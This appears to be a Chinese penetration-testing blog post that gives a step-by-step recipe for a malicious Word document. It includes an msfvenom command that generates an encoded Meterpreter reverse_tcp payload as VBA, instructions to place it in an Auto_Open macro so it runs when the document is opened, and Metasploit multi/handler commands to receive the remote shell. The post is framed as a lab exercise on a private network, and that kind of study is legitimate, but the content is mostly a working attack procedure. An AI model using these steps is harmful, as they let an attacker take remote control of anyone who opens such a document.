喜迎
春节
首页 渗透测试

先把cn_office_professional_plus_2007_dvd_X12-38713.rar上传到win7虚拟上,解压后,安装
然后打开kali生成恶意代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f vba-exe

1

复制代码从Uuvqcerqez开始到最后,回到win7 打开word点击视图点击宏 宏名为Auto_Open新建文档

复制第一段代码粘贴到上面保存

之后把第二段粘贴到正文保存为启用宏的文档

回到kali配置监听模块

msfconsole
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler msf5 
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set 
LHOST 192.168.1.53 msf5 exploit(multi/handler) > jobs -K msf5 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF, 关闭word文档之后session不受影响


成功.




文章评论

评论已关闭